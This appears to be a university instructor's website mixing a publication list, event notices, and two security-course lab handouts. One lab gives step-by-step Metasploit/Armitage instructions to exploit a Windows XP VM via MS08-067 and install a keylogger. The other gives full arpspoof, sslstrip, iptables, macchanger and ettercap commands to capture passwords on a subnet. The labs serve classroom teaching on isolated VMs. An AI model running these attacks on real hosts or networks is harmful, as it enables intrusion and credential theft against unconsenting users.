All posts by admin

2018(7)

    Conference:

  1. Yazhou Tu, Zhiqiang Lin, Insup Lee, and Xiali Hei, Injected and Delivered: Fabricating Implicit Control over Actuation Systems by Spoofing Inertial Sensors. In Proc. of USENIX SECURITY 2018. (acceptance rate:100/524=19%)
  2. Bin Hao, Xiali Hei, Yazhou Tu, Xiaojiang Du, and Jie Wu, A Voice Print based Access Control Scheme for Wireless Insulin Pump System. Submitted to IEEE MASS 2018.
  3. Jianyi Zhang, Xiali Hei, Zhiqiang Wang, Wenming Ma, and Tao Yang, Typer vs. CAPTCHA: Private information based CAPTCHA to defend against crowdsourcing human cheating. Submitted to the 21st Information Security Conference.
  4. Jian Zhao, Kam Kong, Xiali Hei, Yazhou Tu and Xiaojiang Du, A Visible Light Channel based Access Control Scheme for Wireless Insulin Pump Systems. Accepted by IEEE ICC 2018.
  5. Kuo Chi, Longfei Wu, Xiaojiang Du, Guisheng Yin, Jie Wu, Bo Ji and Xiali Hei, Enabling Fair Spectrum Sharing between Wi-Fi and LTE-Unlicensed. Accepted by IEEE ICC 2018
    Journal:

  1. Shiliang Zhang, Hui Cao, Shuo Yang, Yanbin Zhang, Xiali Hei, Sequential Outlier Criterion for Sparsification of Online Adaptive Filtering, Accepted by IEEE Transactions on Neural Networks and Learning Systems. 2018. Impact Factor: 6.108
  2. Shiliang Zhang, Hui Cao, Zonglin Ye, Yanbin Zhang, Xiali Hei, An outlier detection scheme for dynamical sequential datasets, Accepted by Journal Communications in Statistics-Simulation and Computation, 2018. Impact Factor: 0.66

2017(4)

    Conference:

  1. Xiali Hei, Binheng Song, and Caijin Ling. SHipher: Families of Block Ciphers based on customized operator. Accepted by IEEE ICC 2017
  2. Kam Kong, Xiali Hei, Caijin Ling, Mohsen Guizani, and Hui Cao. A Countermeasure Against Face-Spoofing Attacks Using Interaction Video Framework. Published at 2017 IEEE 3rd Information Technology and Mechatronics Engineering Conference (ITOEC).
    Journal:

  1. Shiliang Zhang, Hui Cao, Yanbin Zhang, L Jia, Zonglin Ye, X Hei, Data-Driven Optimization Framework for Nonlinear Model Predictive Control, Mathematical Problems in Engineering, 2017. Impact Factor: 0.802.
  2. Hui Cao, Yajie Yu, Yanbin Zhou, X Hei, Double outlyingness analysis in quantitative spectral calibration: Implicit detection and intuitive categorization of outliers, Chemometrics and Intelligent Laboratory Systems. Vol. 166: 23-36, 2017. Impact Factor:2.303.

Explore Tech Exhibit

The Dover Public Library is one of only 14 sites in the nation selected to host the Explore Tech exhibition, which introduces the role engineers play in our lives and how engineering provides solutions to better meet human needs and develop sustainable innovations for the future. The exhibit features hands-on and multimedia components that allow exhibit visitors to interact with exhibit content in a dynamic way, encouraging new perspectives on engineers and their vital work.

GRAND OPENING
STEM Makerfest
June 10th from 10 a.m. to 3 p.m.
Celebrate the exhibit’s opening with a special kick-off event, STEM Makerfest. Enjoy an exciting day of hands-on science and technology activities and demonstrations.

IMG_0931

IMG_0950IMG_9085IMG_20170610_114752IMG_0943 IMG_9097 IMG_9139 IMG_20170610_094547

IMG_0939

US Cyber Challenge – Cyber Camps in Dover

LINK FROM  https://digiknow.dti.delaware.gov/pages/cybersecurity_challenge/2016default.shtml 

WHAT

Weeklong day camp for students comprised of cyber security workshops, labs, and a competition held on the last day. The camp will focus on topics such as intrusion detection, penetration, and forensics. Workshops will be taught by instructors from the SANS Institute, the largest source for information security training and certification in the world.  The overall objective is to attract as many talented and skilled people as possible to this field of study and career path.

WHO

College and graduate students and high school students. Students need to have completed their sophomore year of high school by the time of the camp. Campers under 18 years of age will need a parent’s consent to attend the camp.

Camp alumni may compete again, but priority for camp positions will go to non-alumni. Camp alumni are encouraged to volunteer to be camp teaching assistants.

WHERE

Delaware State University
Martin Luther King Jr. Student Center
Parlor B&C
1200 N. DuPont Hwy
Dover, DE 19901

Meals will also be provided at the camp (continental breakfast, lunch and snacks).

WHEN

Monday, July 11, 2016 – Friday, July 15, 2016
Friday features a competition, a winners’ ceremony and a press event.

FEES

Some camp attendee fees will be covered by Corporate and USCC scholarships.  In some cases the student will be responsible for a modest fee to attend the camp.

ELIGIBILITY & QUALIFICATION

Eligibility and Qualification for the Delaware Summer Camp is determined by the results of the2016 online Cyber Quests program. This is a fun but challenging on-line competitions allowing participants to demonstrate their knowledge in a variety of information security realms. Each challenge features an artifact for analysis, along with a series of quiz questions. Some focus on a potentially vulnerable sample web server as the artifact, challenging participants to identify its flaws using vulnerability analysis skills. Others are focused around forensic analysis, packet capture analysis, and more. They have varying levels of difficulty and complexity, with some geared toward beginners, while others include more intermediate and ultimately advanced material.

In-class exercises 3 Using Armitage and metasploit to attack a host and install a key logger

You need a WinXP and Kali VMs.  Make sure the network adapters of them were set into Bridged Adapter mode. In our labs, the victims can be any computers in the same local network. To keep us safe, we use WinXP as a target. I will share with you these two VMs.

 

  • Start your Windows XP, Turn off your firewall (Start->Settings->Control panel->Security Center->Windows Firewall->Turn off). Download HoneyBot through Blackboard. Install it and run the HoneyBot. Record your Windows XP’s ip address.
  • Turn off your firewall in WinXP.
  • Start metasploit service in Kali. root@kali:
  • service postgresql      start
  • service metasploit start
  • Start Armitage. root@kali:  armitage, then click connect.
  • It prompts up a question related to RPC server. Click Yes.
  • In Armitage, host->clear database
  • Host->add host->input your WinXp’s IP address
  • Host->msf scan
  • Select your host
  • Attacks->find attacks
  • Right click the host, you will see “attacks”, then choose iis->iis_webdav_upload->launch.
  • You will see this attack failed.
  • Right click the host, you will see “attacks”, then choose smb->ms08_067_netapi, then check “use a reverse connection”, ->launch.
  • You will see your WinXP is attacked. Save a screen as follows:
  • 6
  • After you successfully conducted an attack, you can do anything you want.
  • Right click the host -> Meterpreter 1-> Explore->Log keystokes->lauch
  • 5
  • Go to WindowXp, login your gmail account.
  • Go back to Kali, take a screen image and turn it in.
  • You need to try all others under Explore option. Record the work you have done.
  • Go to Windows XP, Turn on your firewall (Start->Setteings->Control panel->Security Senter->Windows Firewall->Turn on). Repeat 7-20. Take a screenshot image.
  • Make your comments to this lab.
  • Submit your report to the Blackboard.

4

 

In-class exercise 2: Sniff the https passwords using sslstrip in Kali linux

What you need:  Kali101 Linux  and Windows XP VMs.

Import them in your Virtual box.

User name of kali: root      PWD: SCIA472    (They are Shift+S  Shift+S Shift+I Shift+A 472).

This lab can steal all the passwords in a subnet. Please set the network of them to bridged adapter mode, turn off the firewall of Win XP, and give the WinXP 1024M memory.

1 Find you default gateway and interface connected with the victim in Kali:   netstat  -r

1

In this lab,  it should be   192.168.0.1 and the interface is eth0. Write down them for later reference.

2 Find your WinXP’s IP address (it is the victim) in Window XP:  ipconfig  /all

Write your victim’s IP address.

3 Start a new terminal in Kali, type the following command:

echo  1  >  /proc/sys/net/ipv4/ip_forward

This command enables ip forwarding by writing the value 1 in the file specified path.

Remember to do any MITM we need our box to act like a router and be able to forward packets that does not have its ip address in it as the destination.

4 Now we need to set up iptables, so that it will redirect traffic from port 80 to port 10000.

iptables  -t nat -A PREROUTING -p tcp  –destination-port 80 -j REDIRECT –to-port 10000

It starts iptables. –t=tables, nat=this table is consulted when a packet that creates a new connection is encounted. –A is an instruction to append one or more rules to the accepted chain. PREROUTING is one of the built-ins of the NAT table option. It is for altering packets as soon as they come in. –p specifies a protocol, in this case we said tcp. –destination-port we specify port 80 as the destination port. –j specifies an action. And we follow that with the action of redirect (REDIRECT). We redirect to port 10000 because this is the port sslstrip listens on by default.

5 Now just open up another terminal and get ip address of your victim (ip address of your Windows XP).

6 arpspoof  -i  eth0 (your interface)  -t    victim’s ip (WinXp’s address)     default gateway’s ip (192.168.0.1)

-t= target, Arpspoof basically sends arp replies to the target (you WinXp’s address).

The second ip is gateway’s ip, which is the ip we are “pretending” to be. Essentially we are telling the target that we are the gateway.

7 sslstrip   -k    -l   10000  -w  /root/Desktop/sslstrip.log

-k= kill all the sessions in the progress (forces the target ssl session to restart if already going, allows for the tool to work on sessions already established),  -l= listening on port 10000. –w=write the logs into /root/Desktop/sslstrip.log file.

Now tracking the log file which sslstrip produces.

8 In your 1st terminal in Kali:   tail  -f  /root/Desktop/sslstrip.log

 

10  In Windows XP,  Open IE explore, delete history files,  login your  amazon account and gmail account using a fake password. (you can try the online bank account later).

11  You will see the passwords in plain text  in terminal and sslstrip.log

Take a screenshot showing this in Kali by Applications->Accessories->Screenshot

12  In Windows Xp, Open Firefox,   login your facebook and gmail accout

13  What’s the difference between this results and the previous results?

14 Submit a screen image like this to Blackboard.

2

Refer to: http://robospatula.blogspot.com/2013/12/man-in-the-middle-attack-arpspoof-sslstrip.html

Extra bonus:  (3 points)

15  Open a new terminal:

ifconfig eth0 down

macchanger    -mac  00:22:33:44:55:66    eth0 (my interface)

ifconfig  eth0  up

16  ettercap  -T   -q  -M  arp:remote   /victim’s ip/    /gateway’s ip/

(there is no space between / and IP address)

-T simply specifies text only mode. –q specifies quiet mode. Does not print packet content (since we don’t need this). –I eth0 specifies ethernet 0 as the interface to listen on.

17  sslstrip   -k    -l   10000 -w  /root/Desktop/ettercap.log

In Windows Xp,  start IE explore, login your gmail account. Return to kali machine,

18 Open a new terminal:

tail -f /root/Desktop/ettercap.log  

You can see the passwords in the terminal. Save a screen image.

19 Write down your comments on this lab at the end of your report.

20 Turn it in Blackboard.